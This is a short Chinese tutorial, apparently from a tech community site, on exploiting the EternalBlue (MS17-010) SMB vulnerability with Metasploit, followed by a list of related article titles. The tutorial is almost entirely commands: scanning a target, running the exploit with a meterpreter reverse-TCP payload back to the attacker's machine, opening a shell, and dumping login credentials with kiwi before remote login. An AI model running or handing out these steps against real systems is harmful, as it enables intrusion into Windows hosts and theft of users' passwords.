MSF永恒之蓝使用

简介: MSF永恒之蓝使用

MSF永恒之蓝MS17-010


1. 扫描


use auxiliary/scanner/smb/smb_ms17_010(加载模块扫描exp)

set RHOSTS 192.168.167.60(设置被扫描ip)

run(开始扫描,查看是否存在)


检测到可以使用永恒之蓝


2.


use exploit/windows/smb/ms17_010_eternalblue(加载模块)

set RHOSTS 192.168.167.60(IP)

set LHOST 192.168.167.48 (设置本机IP)

set LPORT 4444 (设置连接端口)

set payload windows/x64/meterpreter/reverse_tcp (设置payload) run (开始)

显示IP+端口>>>目标IP+端口(反弹成功)


shell(拿到权限)


3. 获取登录用户名密码


meterpreter > load kiwi

meterpreter > creds_msv

meterpreter > creds_wdigest


拿到登录密码


4. 下面就可以远程登录目标主机了

目录
相关文章
|
Web App开发 数据中心 Windows
【镜像更新】Windows Server 2012 R2 数据中心版
信息摘要: Windows Server 2012 R2 数据中心版镜像更新适用客户: 使用Windows Server 2012 R2的用户版本/规格功能: 镜像ID: win2012r2_64_dtc_9600_zh-cn_40G_alibase_20190318.
6259 0
|
安全 Oracle 关系型数据库
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox4(CTF)
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox4(CTF)
447 1
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox4(CTF)
|
10月前
|
弹性计算 运维 Ubuntu
|
11月前
|
安全 Unix Linux
Kali渗透测试:远程控制被控端免杀及DLL生成、注入反弹(二)
Kali渗透测试:远程控制被控端免杀及DLL生成、注入反弹(二)
451 0
|
网络协议 Linux 网络安全
NMAP扫描基本操作
NMAP扫描基本操作
619 5
|
存储 Linux Android开发
Volatility3内存取证工具安装及入门在Linux下的安装教程
Volatility 是一个完全开源的工具,用于从内存 (RAM) 样本中提取数字工件。支持Windows,Linux,MaC,Android等多类型操作系统系统的内存取证。针对竞赛这块(CTF、技能大赛等)基本上都是用在Misc方向的取证题上面,很多没有听说过或者不会用这款工具的同学在打比赛的时候就很难受。以前很多赛项都是使用vol2.6都可以完成,但是由于操作系统更新,部分系统2.6已经不支持了,如:Win10 等镜像,而Volatility3是支持这些新版本操作系统的。
2248 0
|
存储 安全 JavaScript
探秘X-XSS-Protection头对抗跨站脚本攻击
探秘X-XSS-Protection头对抗跨站脚本攻击
735 0
|
安全 Linux API
一篇文章讲明白Metasploit详解详细图文教程
一篇文章讲明白Metasploit详解详细图文教程
932 0
|
安全 网络安全 数据安全/隐私保护
【内网安全】横向移动&域控提权&NetLogon&ADCS&PAC&KDC&永恒之蓝
【内网安全】横向移动&域控提权&NetLogon&ADCS&PAC&KDC&永恒之蓝
201 0
【内网安全】横向移动&域控提权&NetLogon&ADCS&PAC&KDC&永恒之蓝
|
网络协议 安全 Linux
嗅探神器:Ettercap 保姆级教程
嗅探神器:Ettercap 保姆级教程